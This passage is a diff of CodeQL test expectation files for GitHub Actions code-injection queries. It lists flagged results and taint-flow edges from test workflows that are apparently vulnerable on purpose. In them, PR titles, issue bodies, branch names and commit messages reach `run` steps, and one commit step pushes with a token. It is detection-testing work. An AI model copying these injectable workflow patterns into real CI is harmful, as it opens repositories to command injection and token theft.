--raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref new file mode 100644 index 000000000000..9af8ec0f9ab1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected new file mode 100644 index 000000000000..b341ac198536 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -0,0 +1,708 @@ +edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | provenance | | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | 